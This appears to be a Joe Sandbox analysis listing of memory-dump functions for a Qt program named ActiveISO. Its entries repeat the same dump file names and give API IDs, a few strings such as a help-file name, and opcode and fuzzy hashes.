                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Settings@@TypedVariant@@$?set?text@Edit@@LineString@@@Value@Variant@@@$V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3731313391-0
                                                                                                                  • Opcode ID: b62795a480f749a943609a00f233b8e22f8eccb22d64dd3deb96fd991aca714e
                                                                                                                  • Instruction ID: e4bff07e4b0f49b09d3015accfdd7c16ac6a554de81a23959caa5663a624f96b
                                                                                                                  • Opcode Fuzzy Hash: b62795a480f749a943609a00f233b8e22f8eccb22d64dd3deb96fd991aca714e
                                                                                                                  • Instruction Fuzzy Hash: 6AF0BB21E2864292EA10DB61E85607D6322FBC6F74F140230D67EB76F4DF2CE555C748
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?sharedArrayData@@FileIconNull@Object@@@Provider@@String@@Thread@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3745644636-0
                                                                                                                  • Opcode ID: 30b98e14e93ae9924371a700772f6603b964e4402c826684dfa19cc9c4c52e4d
                                                                                                                  • Instruction ID: 80593b2bc62e32f02307db998887b506f081dac67c914ba754100c1628e70fb9
                                                                                                                  • Opcode Fuzzy Hash: 30b98e14e93ae9924371a700772f6603b964e4402c826684dfa19cc9c4c52e4d
                                                                                                                  • Instruction Fuzzy Hash: 58F01731924F46D6E7009F65E88632833A6FB08F48F480131CA5DA2324EF3CD4A8C384
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?sharedArrayData@@FileIconNull@Object@@@Provider@@String@@Thread@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3745644636-0
                                                                                                                  • Opcode ID: 76c6e1cd15b9680f043d47bfae3e9b1e627a17eabfd3ac77d79b1345771a8c6b
                                                                                                                  • Instruction ID: 65836bcc67b951657a4fe33523ba70b90c48d90b8e2705bb5c392a802117342a
                                                                                                                  • Opcode Fuzzy Hash: 76c6e1cd15b9680f043d47bfae3e9b1e627a17eabfd3ac77d79b1345771a8c6b
                                                                                                                  • Instruction Fuzzy Hash: 64F01C31914B42D5E7109F71E88612933B5FF09F59F480131C94DA2324EF3CD899C384
                                                                                                                  APIs
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,1setTitles_waitForm(QString, QString),00007FF6537283DB), ref: 00007FF6537253CB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,1setTitles_waitForm(QString, QString),00007FF6537283DB), ref: 00007FF6537253D4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@
                                                                                                                  • String ID: 1setTitles_waitForm(QString, QString)
                                                                                                                  • API String ID: 1688221058-2232255253
                                                                                                                  • Opcode ID: 006c18be196bf2f44789eb125d56908361dc495fb530a8ff4d99ba0a9ce45239
                                                                                                                  • Instruction ID: b976257e5da9de574c7ee1d64ff740ff236c6cbd3cd3bc988a187b81c85adbf3
                                                                                                                  • Opcode Fuzzy Hash: 006c18be196bf2f44789eb125d56908361dc495fb530a8ff4d99ba0a9ce45239
                                                                                                                  • Instruction Fuzzy Hash: 90E06512E2868082D6509B11FA8107DA252FF58FD0B4D6030FE5A67B44CF2CD492C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?current?setAction@@Enabled@Index@Widget@@
                                                                                                                  • String ID: 1setTitles_waitForm(QString, QString)
                                                                                                                  • API String ID: 316701015-2232255253
                                                                                                                  • Opcode ID: 0df84376186d0facf0dc76594dc39389ec2da079da92c3a581bc7093c847e0b2
                                                                                                                  • Instruction ID: 3cafe59d39ce6861f18332a25e863e9fa658a65b572fa10ea8ec08b9fc96b0c7
                                                                                                                  • Opcode Fuzzy Hash: 0df84376186d0facf0dc76594dc39389ec2da079da92c3a581bc7093c847e0b2
                                                                                                                  • Instruction Fuzzy Hash: 82F01236E2894692EA14CB66F8862F96362FB88F55F4C8430DA5EB7614CF7CD4828344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExecuteShell
                                                                                                                  • String ID: activeiso.chm$open
                                                                                                                  • API String ID: 587946157-709986655
                                                                                                                  • Opcode ID: 3ef4ac267e7080a789d793e5712872282c13b7d5680b3288f3ee39c7f1835380
                                                                                                                  • Instruction ID: 9379b9a97346ac621f3b01e978dbe7cc3bcf0fbeb48feb1003d7388aff6cb382
                                                                                                                  • Opcode Fuzzy Hash: 3ef4ac267e7080a789d793e5712872282c13b7d5680b3288f3ee39c7f1835380
                                                                                                                  • Instruction Fuzzy Hash: 1ED0A770E14A8181F7208B10F8023D527B2FB4875CFC41029C14DB5620CF7CC188C788
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$freememmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1673302032-0
                                                                                                                  • Opcode ID: c176bcf584ec3c2de96001958d14776c2961ab16b9e0ac51f7b2e903f71aea03
                                                                                                                  • Instruction ID: 151906a38ca88bb63a8e535796b90d8249eaad53850cd725ef0887e650933b68
                                                                                                                  • Opcode Fuzzy Hash: c176bcf584ec3c2de96001958d14776c2961ab16b9e0ac51f7b2e903f71aea03
                                                                                                                  • Instruction Fuzzy Hash: 3C217372E24A8187EB49CF6AE44526963E1FB84B80F488431DB5DA7754DF38D8A1C344